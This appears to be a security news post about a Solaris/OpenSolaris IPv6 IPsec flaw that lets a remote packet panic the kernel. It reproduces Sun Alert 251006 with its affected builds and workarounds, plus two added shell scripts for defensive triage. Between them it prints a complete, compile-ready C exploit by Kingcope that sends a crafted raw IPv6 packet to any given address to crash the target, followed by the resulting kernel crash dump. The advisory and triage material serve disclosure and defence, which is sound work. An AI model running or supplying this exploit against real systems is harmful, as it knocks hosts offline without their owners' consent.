
Sun Solaris IPv6 'ipsec_needs_processing_v6()' Remote Denial of Service Vulnerability

A zero-day exploit for an IPv6 IPsec-related flaw in Solaris systems has been published.

Sun has not yet released an official patch.

The versions listed below are vulnerable, so take particular care.

Sun SunOS 5.11
Sun Solaris 11
Sun Solaris 10.0_x86
Sun Solaris 10
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_29
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01


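These versions are exposed to a remote denial-of-service attack.

The remedy is to move to an upgraded release of the affected versions.

Refer to the following for details.
http://sunsolve.sun.com/search/document.do?assetkey=1-66-251006-1
The full text of the linked document is reproduced below.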



Document Audience: PUBLIC
Document ID: 251006
Title: A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic
Copyright Notice: Copyright © 2009 Sun Microsystems, Inc. All Rights Reserved
Update Date: Tue Jan 27 00:00:00 MST 2009

Solution Type Sun Alert

Solution  251006 :   A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic  


Related Categories
  • Home>Content>Sun Alert Criteria Categories>Security
  • Home>Content>Sun Alert Release Phase>Workaround

Bug ID
6797796


Product
Solaris 10 Operating System
OpenSolaris


Date of Workaround Release
27-Jan-2009


SA Document Body
A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic

1. Impact

An insufficient validation security vulnerability in the Solaris IPv6 implementation (ip6(7p)) may allow a remote privileged user to panic the system using a crafted packet.  This is a type of Denial of Service (DoS).

2. Contributing Factors

This issue can occur in the following releases:

SPARC Platform:
  • Solaris 10
  • OpenSolaris based upon builds snv_01 through snv_107
x86 Platform:
  • Solaris 10
  • OpenSolaris based upon builds snv_01 through snv_107
Notes:

1. Solaris 8 and Solaris 9 are not affected by this issue.

2. This issue only affects systems which have at least one IPv6 interface configured and "up".

The ifconfig(1M) command can be used to list all IPv6 interfaces configured and "up" on the system as follows:

$ ifconfig -au6

Solaris 10 does not have a default IPv6 interface configured since administrators are required to enable or disable IPv6 at install time.

3. OpenSolaris distributions may include additional bug fixes above and beyond the base build from which it was derived. The base build can be derived as follows:

$ uname -v
snv_86

3. Symptoms

If the described issue occurs, the following panic string and stack trace may be seen:

ipsec_needs_processing_v6

ipsec_needs_processing_v6 ()
ipsec_early_ah_v6 ()
ip_rput_data_v6 ()
ip_rput_v6 ()
putnext ()
dld_str_rx_fastpath ()
i_dls_link_rx ()
...

4. Workaround

Malformed packets can be blocked to prevent this issue from occurring using Solaris IP Filter (ipfilter(5)) with the following rule:

block in quick all with short

Please refer to ipf(1M) and ipf(4) for enabling and configuring ipfilter.

If an IPv6 interface is configured but not being used, then disabling the IPv6 interface will also prevent this issue from occurring on the system.

To disable all IPv6 interfaces on a system, the following command can be run as root:

# ifconfig -a6 down

The following Interim Security Relief (ISRs) are available from http://www.sunsolve.sun.com/tpatches

SPARC Platform
  • Solaris 10 IDR140811-01
x86 Platform
  • Solaris 10 IDR140812-01
Note: This document refers to one or more Interim Security Relief (ISRs) which are designed to address the concerns identified herein. Sun has limited experience with these (ISRs) due to their interim nature. As such, you should only install the ISRs on systems meeting the configurations described above. Sun may release full patches at a later date, however, Sun is under no obligation whatsoever to create, release, or distribute any such patch.

5. Resolution

This issue is addressed in the following releases:

SPARC Platform
  • OpenSolaris based upon builds snv_108 or later
x86 Platform:
  • OpenSolaris based upon builds snv_108 or later
A final resolution is pending completion for Solaris 10.

For more information on Security Sun Alerts, see Technical Instruction ID 213557.

This Sun Alert notification is being provided to you on an "AS IS" basis. This Sun Alert notification may contain information provided by third parties. The issues described in this Sun Alert notification may or may not impact your system(s). Sun makes no representations, warranties, or guarantees as to the information contained herein. ANY AND ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING THIS DOCUMENT YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE OUT OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN. This Sun Alert notification contains Sun proprietary and confidential information. It is being provided to you pursuant to the provisions of your agreement to purchase services from Sun, or, if you do not have such an agreement, the Sun.com Terms of Use. This Sun Alert notification may only be used for the purposes contemplated by these agreements.

Copyright 2000-2009 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara, CA 95054 U.S.A. All rights reserved.

Attachments
This solution has no attachment
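
The checks in Notes 1 to 3 of the alert (release, uname -v build, and ifconfig -au6) can be combined into one triage function. This is an added example, not part of the Sun Alert or the original post; the function names and result labels are hypothetical, the sample ifconfig output is constructed, and it does not check whether an ISR is installed on Solaris 10.

```shell
#!/bin/sh
# Added example (hypothetical helper names): triage a host against Sun Alert 251006.

# snv_build VERSION: print the numeric build of "snv_NNN[x]", nothing otherwise.
snv_build() {
    case "$1" in snv_[0-9]*) ;; *) return 0 ;; esac
    # Drop a trailing letter (snv_101b) and leading zeros (snv_09 is not octal).
    n=$(printf '%s' "${1#snv_}" | sed 's/[^0-9].*$//; s/^0*//')
    printf '%s\n' "${n:-0}"
}

# count_up_v6 TEXT: number of interfaces listed in `ifconfig -au6` output.
count_up_v6() {
    printf '%s\n' "$1" | grep -c '^[^[:space:]][^[:space:]]*: flags=' || true
}

# assess RELEASE VERSION IFTEXT, fed from uname -r, uname -v, ifconfig -au6.
assess() {
    case "$1" in
        5.8|5.9) echo "not-affected"; return 0 ;;   # Solaris 8 and 9 (Note 1)
        5.10) ;;                                     # Solaris 10: fix pending
        5.11)
            build=$(snv_build "$2")
            [ -n "$build" ] || { echo "unknown"; return 0; }
            [ "$build" -lt 108 ] || { echo "fixed"; return 0; } ;;
        *) echo "unknown"; return 0 ;;
    esac
    # Affected release: exposure depends on an IPv6 interface being up (Note 2).
    if [ "$(count_up_v6 "$3")" -gt 0 ]; then
        echo "exposed"
    else
        echo "affected-ipv6-down"
    fi
}

# Constructed sample of `ifconfig -au6` output (not captured from a real host).
SAMPLE_IF='lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
        inet6 ::1/128
e1000g0: flags=2000841<UP,RUNNING,MULTICAST,IPv6> mtu 1500 index 2
        inet6 fe80::1/10'

assess 5.11 snv_101b "$SAMPLE_IF"
# On a live host: assess "$(uname -r)" "$(uname -v)" "$(ifconfig -au6)"
```
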

The exploit code is as follows.

/*
SunOS Release 5.11 Version snv_101b Remote IPV6
Kernel Crash Exploit 0day
By Kingcope/2009
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

unsigned char rawData[] =
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";

int main(int argc, char *argv[])
{
struct sockaddr_in6 dst;
int s;

if (argc < 2)
{
printf("SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n");
printf("Usage: %s <dst>\n", *argv);
return(1);
}

memset(&dst, 0, sizeof(dst));
if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) &dst.sin6_addr) != 1) {
printf("Error: inet_pton()\n");
exit(-1);
}
memcpy(rawData+24, &dst.sin6_addr, 16);

dst.sin6_family = AF_INET6;

s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);

printf("Sending IPV6 packet: %s\n", argv[1]);

if (sendto(s,&rawData,sizeof(rawData),0,(struct sockaddr*)&dst,sizeof(dst)) == -1)
{
perror("Error sending packet");
exit(-1);
}

return(0);
}

/*
Kernel Crash Dump May Look Like The Following Snippet
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 100000 kern.notice]
[ID 655072 kern.notice] ffffff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ffffff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ffffff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ffffff00012b9940 ip:ip_rput_v6+64e ()
[ID 655072 kern.notice] ffffff00012b99b0 unix:putnext+21e ()
[ID 655072 kern.notice] ffffff00012b9a00 dld:dld_str_rx_fastpath+8a ()
[ID 655072 kern.notice] ffffff00012b9ad0 dls:i_dls_link_rx+2c7 ()
[ID 655072 kern.notice] ffffff00012b9b50 mac:mac_do_rx+b7 ()
[ID 655072 kern.notice] ffffff00012b9b80 mac:mac_rx+1f ()
[ID 655072 kern.notice] ffffff00012b9bd0 e1000g:e1000g_intr+135 ()
[ID 655072 kern.notice] ffffff00012b9c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012b9c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff00012c5870 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff00012c58c0 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff00012c58d0 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff00012c5a00 unix:ddi_mem_putb+f ()
[ID 655072 kern.notice] ffffff00012c5a40 ata:ata_disk_start_dma_out+88 ()
[ID 655072 kern.notice] ffffff00012c5a90 ata:ata_ctlr_fsm+1fb ()
[ID 655072 kern.notice] ffffff00012c5af0 ata:ata_hba_start+84 ()
[ID 655072 kern.notice] ffffff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()
[ID 655072 kern.notice] ffffff00012c5ba0 ata:ghd_intr+8d ()
[ID 655072 kern.notice] ffffff00012c5bd0 ata:ata_intr+27 ()
[ID 655072 kern.notice] ffffff00012c5c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ffffff00012c5c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ffffff0001205ab0 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ffffff0001205b00 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ffffff0001205b10 unix:cmnint+ba ()
[ID 655072 kern.notice] ffffff0001205c00 unix:mach_cpu_idle+b ()
[ID 655072 kern.notice] ffffff0001205c40 unix:cpu_idle+17b ()
[ID 655072 kern.notice] ffffff0001205c60 unix:idle+4c ()
[ID 655072 kern.notice] ffffff0001205c70 unix:thread_start+8 ()
[ID 100000 kern.notice]
[ID 672855 kern.notice] syncing file systems...
[ID 904073 kern.notice] done
[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel
[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,
[ID 851671 kern.notice] dump succeeded
[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit
[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc. All rights reserved.
*/
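
For crash triage, the panic described under "3. Symptoms" can be recognised in saved kernel messages by its top two stack frames. This is an added example, not part of the original post or the Sun Alert; the function names are hypothetical. The first five sample lines are taken from the crash dump above and the last two frames are constructed as a non-matching stack. Matching the frame pair counts each panic once, whereas a plain search for the function name also hits the panic-string line.

```shell
#!/bin/sh
# Added example (hypothetical helper names): count panics whose stack shows
# ipsec_needs_processing_v6 called directly from ipsec_early_ah_v6.

# count_ipsec_v6_panics [FILE...]: reads the files, or stdin when none given.
count_ipsec_v6_panics() {
    awk '
    {
        fn = ""
        # A frame line ends in "module:function+offset ()".
        if (match($0, /[a-z0-9_]+:[A-Za-z0-9_]+\+[0-9a-f]+ \(\)/)) {
            fn = substr($0, RSTART, RLENGTH)
            sub(/^[^:]*:/, "", fn)    # drop "module:"
            sub(/\+.*$/, "", fn)      # drop "+offset ()"
        }
        if (fn == "ipsec_early_ah_v6" && prev == "ipsec_needs_processing_v6")
            hits++
        prev = fn                     # a non-frame line breaks the pair
    }
    END { print hits + 0 }' "$@"
}

# Sample input: lines 1-5 from the dump on this page, lines 6-7 constructed.
sample_log() {
    cat <<'EOF'
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 100000 kern.notice]
[ID 655072 kern.notice] ffffff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ffffff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ffffff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ffffff0001300000 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ffffff0001300010 ip:ip_rput_data_v6+f4e ()
EOF
}

sample_log | count_ipsec_v6_panics
```
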